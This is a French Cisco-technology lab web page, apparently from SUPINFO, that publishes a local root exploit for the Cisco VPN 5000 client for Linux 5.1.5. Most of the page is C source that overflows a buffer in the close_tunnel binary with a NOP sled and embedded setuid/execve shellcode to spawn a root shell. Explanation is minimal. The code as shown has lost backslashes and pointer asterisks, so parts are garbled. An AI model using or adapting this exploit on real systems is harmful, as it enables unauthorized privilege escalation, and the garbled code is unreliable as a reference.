Laboratoire SUPINFO des technologies Cisco - VPN 5000 pour Linux

VPN 5000 pour Linux

07-09-2008

Le Laboratoire

Menu principal

Letterman Subscribe
Suggérer par mail Inscrire Annuler

La référence absolue sur les technologies Cisco

VPN 5000 pour Linux

Écrit par labo-cisco
10-01-2003
Client VPN 5000 de Cisco pour Linux version 5.1.5 Code qui exploite les privilèges root en local en utilisant le canal binaire fermé. Tester sur la version 5.1.5 du package : vpn-5000-linux-5.1.5-des-k8.tar.Z, sur un système Red Hat Linux 7.2 /x86. #include <stdio.h> #include <unistd.h> #define B 2504 #define N 0x90 #define R 0xbfffefc0 // may needs to be changed deppending on the distro/os.. #define BIN "/bin/close_tunnel" // you maybe want to change this too =P // /usr/local/bin/close_tunnel or so.. char shell[] = "HELO" // yes this is a valid x86 instruction ;) "x31xdbx89xd8xb0x17xcdx80" // setuid(); "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0c" "xb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdb" "x89xd8x40xcdx80xe8xdcxffxffxff/bin/sh"; int main(int argc, char *argv[]) { int ret, off, es; char bof[B]; printf(" "); printf(" Cisco VPN 5000 client exploit "); if(argv[1] == NULL) { off = 0; ret = R; } else { off = atoi(argv[1]); ret = atoi(argv[2])+off; } for (es = 0; es < B; es += 4 ) (long ) &bof[es] = ret; printf("+ return address: 0x%lx ",ret); for (es = 0; es < (B - strlen(shell) - 36); ++es) (bof+es) = N; memcpy(bof+es, shell, strlen(shell)); printf("+ overflowing the buffer.. "); execl(BIN,BIN,"-d",bof,0); return(0); }
Dernière mise à jour : ( 10-01-2003 )

< Précédent		Suivant >

CLTE - Moteur de tests en ligne

Le CLTE est le moteur de tests en ligne du Laboratoire SUPINFO des Technologies Cisco.

Connectez-vous !

Création d'un compte gratuit

Top!

Top!